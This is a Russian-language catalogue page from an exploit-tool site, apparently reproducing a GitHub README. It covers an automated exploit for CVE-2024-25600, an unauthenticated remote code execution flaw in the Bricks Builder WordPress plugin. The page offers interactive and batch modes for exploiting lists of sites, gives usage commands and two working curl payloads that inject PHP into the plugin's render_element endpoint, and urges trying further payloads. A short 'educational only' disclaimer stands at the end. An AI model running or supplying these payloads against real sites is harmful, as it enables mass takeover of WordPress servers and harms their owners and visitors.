Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — Автоматизированный инструмент эксплойта для CVE-2024-25600, позволяющий неаутентифицированное удаленное выполнение кода на сайтах WordPress с использованием плагина Bricks Builder. Поддерживает интерактивный и пакетный режимы для выполнения команд. | Kitploit
Инструменты/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

Автоматизированный инструмент эксплойта для CVE-2024-25600, позволяющий неаутентифицированное удаленное выполнение кода на сайтах WordPress с использованием плагина Bricks Builder. Поддерживает интерактивный и пакетный режимы для выполнения команд.

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инструмент эксплуатации CVE-2024-25600 🚀

Описание 📝

Этот инструмент 🛠️ предназначен для эксплуатации уязвимости CVE-2024-25600 🕳️, обнаруженной в плагине Bricks Builder для WordPress. Уязвимость позволяет неавторизованное удалённое выполнение кода на затронутых веб-сайтах 💻. Инструмент автоматизирует процесс эксплуатации, получая nonce-значения и отправляя специально сформированные запросы для выполнения произвольных команд.

Возможности 🌟

  • Интерактивный режим: взаимодействие с целевым веб-сайтом в реальном времени 🕹️.
  • Пакетный режим: сканирование и эксплуатация нескольких веб-сайтов из списка 📋.
  • Выполнение команд: выполнение произвольных команд на целевом сервере ⚙️.

Установка 🛠️

  1. Клонируйте этот репозиторий на свой локальный компьютер 🖥️ с помощью git clone.
  2. Перейдите в каталог клонированного репозитория.
  3. Установите необходимые библиотеки Python с помощью pip install -r requirements.txt.

Использование 📖

Интерактивный режим 🎮

  1. Запустите инструмент командой python exploit.py -u <URL>, чтобы начать интерактивный режим.
  2. Следуйте подсказкам на экране, чтобы отправлять команды на целевой сервер.

Пакетный режим 📊

  1. Подготовьте текстовый файл со списком целевых URL-адресов.
  2. Запустите инструмент командой python exploit.py -l <file_path>, чтобы просканировать и эксплуатировать указанные сайты.

Доказательство концепции (PoC) 📝

Базовый PoC, предоставленный в раскрытии, выглядит следующим образом:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Обновление: второй PoC (более надёжный)

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Возможно, дополнительные полезные нагрузки дадут лучшие результаты. Если мой эксплойт или PoC не работает для вас, рекомендую поэкспериментировать с альтернативными полезными нагрузками, чтобы найти более эффективное решение.

Замените [HOST] на целевой веб-сайт, а [NONCE] — на значение nonce, полученное с сайта.

Ссылка 📖

Для получения дополнительной информации об уязвимости CVE-2024-25600 обратитесь к подробному раскрытию на Snicco.io.

Отказ от ответственности ⚠️

Информация, представленная в этом README, предназначена только для образовательных целей. Несанкционированный взлом веб-сайтов или сетей является незаконным и неэтичным. 🚫

Благодарности 🙏

Благодарим исследователей безопасности, которые обнаружили и сообщили об этой уязвимости, предоставив сообществу информацию и инструменты для защиты веб-приложений.

Скачать инструмент